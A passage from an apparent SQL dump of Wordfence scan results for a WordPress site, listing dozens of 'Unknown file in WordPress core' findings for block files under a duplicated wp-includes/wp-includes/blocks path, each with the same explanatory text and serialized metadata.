More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/blocks/block.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33675,1631564676,1631564676,'new','knownfile',75,'2b2b811986f19d6d9dd6876427bc259d','ae86bd6f57f45d475821154e35b9f7aa','Unknown file in WordPress core: wp-includes/wp-includes/blocks/button/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/blocks/button/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33676,1631564676,1631564676,'new','knownfile',75,'00ae959ba03b5768913a2e80e5f5ad77','c54841cc646b93498fb38719f785653f','Unknown file in WordPress core: wp-includes/wp-includes/blocks/buttons/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/buttons/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33677,1631564676,1631564676,'new','knownfile',75,'3bdd623e8c1d7018d9ef9e4fa5939339','75499d0fcb9a95271e4703709ed4adb6','Unknown file in WordPress core: wp-includes/wp-includes/blocks/calendar/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/calendar/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33678,1631564676,1631564676,'new','knownfile',75,'46a6097faf11d4af8c283f92addec3a6','24f0d94eafdc9f610e55c5ff4996f50c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/calendar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/blocks/calendar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33679,1631564676,1631564676,'new','knownfile',75,'bbed5f8230a1f12aacd4622f0ffed0e6','8d24f57d9d3570d050e5a6bbd41929fd','Unknown file in WordPress core: wp-includes/wp-includes/blocks/categories/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/blocks/categories/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33680,1631564676,1631564676,'new','knownfile',75,'312daf0dc3be71ea7002dfef42c582aa','e36363e97d57bcc14f487a93a0bf61d3','Unknown file in WordPress core: wp-includes/wp-includes/blocks/categories.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/blocks/categories.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33681,1631564676,1631564676,'new','knownfile',75,'2fb74ee0aa43b8fcd1089d7a2e818158','1bf1af0357e3df1a87d49622a02d9d32','Unknown file in WordPress core: wp-includes/wp-includes/blocks/code/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/code/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33682,1631564676,1631564676,'new','knownfile',75,'c69e6ded18964ab230f11e0cdaa54556','4f90806a246904af5b31fb3a4ff72c0c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/column/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/blocks/column/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33683,1631564676,1631564676,'new','knownfile',75,'0511d1c1bcbd28cc1c97ff9982dc0b93','f626ff7bb08c7c08a18f15b008a6638c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/columns/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/columns/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33684,1631564676,1631564676,'new','knownfile',75,'b87e0e711845fd23b829680a8ff5f8d6','0ab8fe8ce014099aad8858e0edfa6455','Unknown file in WordPress core: wp-includes/wp-includes/blocks/embed/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/embed/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33685,1631564676,1631564676,'new','knownfile',75,'3079d1e83371793468dfb76f51e9338d','6b9d06270747cc51ef449fa2129a5654','Unknown file in WordPress core: wp-includes/wp-includes/blocks/file/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/file/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33686,1631564676,1631564676,'new','knownfile',75,'2f76e1fca2b863dafdf9163b6ef9b21a','eaea4d8e776fa75cd111d0179b8bfa0b','Unknown file in WordPress core: wp-includes/wp-includes/blocks/freeform/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/freeform/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33687,1631564676,1631564676,'new','knownfile',75,'18bc46b1221c6ec3dcd06166d1e4d813','fa889916e3c11dec056443d2b58ab817','Unknown file in WordPress core: wp-includes/wp-includes/blocks/gallery/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/gallery/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33688,1631564676,1631564676,'new','knownfile',75,'93bd26e45de6d181eca61aacbf2b9719','dc136b8ba41e71c2a6a18b62bd58c93a','Unknown file in WordPress core: wp-includes/wp-includes/blocks/group/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/group/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33689,1631564676,1631564676,'new','knownfile',75,'14736d6e45156efa0e95f3e5ebf81de5','3ca75b855fde77be92d0444b2309bd57','Unknown file in WordPress core: wp-includes/wp-includes/blocks/heading/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/heading/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33690,1631564676,1631564676,'new','knownfile',75,'57ab946fcfe17c2d6a6dc1d783fcbdf6','99260370d7af4cd1c2687f44789f8faf','Unknown file in WordPress core: wp-includes/wp-includes/blocks/html/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/html/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33691,1631564676,1631564676,'new','knownfile',75,'213bd7df9668b5b3d64149129a6900b1','89ac4402024502c8cb9bfb5205601a4c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/image/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/image/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33692,1631564676,1631564676,'new','knownfile',75,'e2618b136d3ddcad8b37dfd9c0e6d1b0','c6a351a22c8bf5d4e73d9bc6866cbf58','Unknown file in WordPress core: wp-includes/wp-includes/blocks/index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/blocks/index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33693,1631564676,1631564676,'new','knownfile',75,'234bfd1d046018e80f3e22c4408e54cc','8ff9400625519cacd0bb673272f8c00d','Unknown file in WordPress core: wp-includes/wp-includes/blocks/latest-comments/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/blocks/latest-comments/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33694,1631564676,1631564676,'new','knownfile',75,'ca16b53e4de3146febe8e80a2624ecf2','fedb4a3fa01fd6350e478bfc0fe55e6e','Unknown file in WordPress core: wp-includes/wp-includes/blocks/latest-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/latest-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33695,1631564676,1631564676,'new','knownfile',75,'3b949dc86a3e0dbed5f991b0e3a1072b','ce21128b662589953c4ce1573aba722e','Unknown file in WordPress core: wp-includes/wp-includes/blocks/latest-posts/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/blocks/latest-posts/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33696,1631564677,1631564677,'new','knownfile',75,'d758f2aa833b8d9f1d8a643d297c3efa','448e0770bd7fe98bfd31f5e9dac9bc00','Unknown file in WordPress core: wp-includes/wp-includes/blocks/latest-posts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/latest-posts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33697,1631564677,1631564677,'new','knownfile',75,'fbfa76a3ea189cec8bb2c1fa39c86ff9','40bfc728f9ac95b8ebc63a3086ea13c8','Unknown file in WordPress core: wp-includes/wp-includes/blocks/list/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/list/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33698,1631564677,1631564677,'new','knownfile',75,'5723eb3ea1ae4d0810fa858858f394b7','4e5b7f807c1472f75fece1de552af9c7','Unknown file in WordPress core: wp-includes/wp-includes/blocks/media-text/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/blocks/media-text/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33699,1631564677,1631564677,'new','knownfile',75,'60396bdd5af83141ad20fb3925bb254a','dff98142d2a72ec1686e7d923db31598','Unknown file in WordPress core: wp-includes/wp-includes/blocks/missing/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/missing/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33700,1631564677,1631564677,'new','knownfile',75,'e2c3b73bbc00182a39b015067b24036e','7e1f56dc60adf57d53857bedfb78d0df','Unknown file in WordPress core: wp-includes/wp-includes/blocks/more/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/more/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33701,1631564677,1631564677,'new','knownfile',75,'d3c5e7c21a8310047537794cc0179440','38c35a908c117ad181416f39a0ac399c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/nextpage/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/nextpage/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33702,1631564677,1631564677,'new','knownfile',75,'dd07d5514565342a95d0140c7e3338d3','440328570b3b9021bf59c1e34e573e8e','Unknown file in WordPress core: wp-includes/wp-includes/blocks/paragraph/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/paragraph/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33703,1631564677,1631564677,'new','knownfile',75,'6e1bc06b988a6682c7908f30ab51024a','a193d581f84ad7d16172ebfc6cd2d679','Unknown file in WordPress core: wp-includes/wp-includes/blocks/preformatted/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/blocks/preformatted/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33704,1631564677,1631564677,'new','knownfile',75,'ebd0b499dd8749ffad4fef6101a9512c','551620a63fc8703dbe7f8245b7564f26','Unknown file in WordPress core: wp-includes/wp-includes/blocks/pullquote/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/pullquote/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33705,1631564677,1631564677,'new','knownfile',75,'603c8ad376ced1d86945959ae4bf5cb0','13ac10fd9dfa6599c357b8a12a52dbeb','Unknown file in WordPress core: wp-includes/wp-includes/blocks/quote/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/quote/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33706,1631564677,1631564677,'new','knownfile',75,'276d9015d82a1b5750627a935978e534','456846a4a4022c91963b85da6aeedeb7','Unknown file in WordPress core: wp-includes/wp-includes/blocks/rss/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/blocks/rss/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33707,1631564677,1631564677,'new','knownfile',75,'66616582ff57ec00ee8dad683b1761e6','8bfb68c18eeab51dedb3bb8fb1c1df7c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/blocks/rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33708,1631564677,1631564677,'new','knownfile',75,'ec284de3d4b998506fe7d55bdec12281','2fca7660e2ff52003ae555ec40367983','Unknown file in WordPress core: wp-includes/wp-includes/blocks/search/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/blocks/search/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33709,1631564677,1631564677,'new','knownfile',75,'dcb669b892a6954a386bf450b091397e','f777e55a60491e06813416787aff1d61','Unknown file in WordPress core: wp-includes/wp-includes/blocks/search.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/blocks/search.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33710,1631564677,1631564677,'new','knownfile',75,'a33594215bc08c6f5b4668babb0acb0c','4b3cb7fe95d0c6e7bc8e26e709523346','Unknown file in WordPress core: wp-includes/wp-includes/blocks/separator/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/separator/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33711,1631564677,1631564677,'new','knownfile',75,'50a4446d741c8efca0fb8e8444e007df','772a6070b9b829b375f527e29bbc867a','Unknown file in WordPress core: wp-includes/wp-includes/blocks/shortcode/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/shortcode/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33712,1631564677,1631564677,'new','knownfile',75,'795b4acd27834f3b5773803aa72bb167','86260232f836f00ac5b16e21b4fcc25b','Unknown file in WordPress core: wp-includes/wp-includes/blocks/shortcode.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/blocks/shortcode.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33713,1631564677,1631564677,'new','knownfile',75,'0396e52b609e28ddb100eb2ac8c93f42','225a5642ec30875a6fadf95718397796','Unknown file in WordPress core: wp-includes/wp-includes/blocks/social-link/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/blocks/social-link/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33714,1631564678,1631564678,'new','knownfile',75,'8b95e4742c60da50cf7c79e0adff49c2','abbdd99c7a54ad8c618b464127bb6f06','Unknown file in WordPress core: wp-includes/wp-includes/blocks/social-link.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/social-link.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33715,1631564678,1631564678,'new','knownfile',75,'e240da9ff283bcc5a7404926b0001a7c','2fd416e1ab90d45093a9776039858452','Unknown file in WordPress core: wp-includes/wp-includes/blocks/social-links/block.json','This file is in a WordPress core location but is not distributed with this 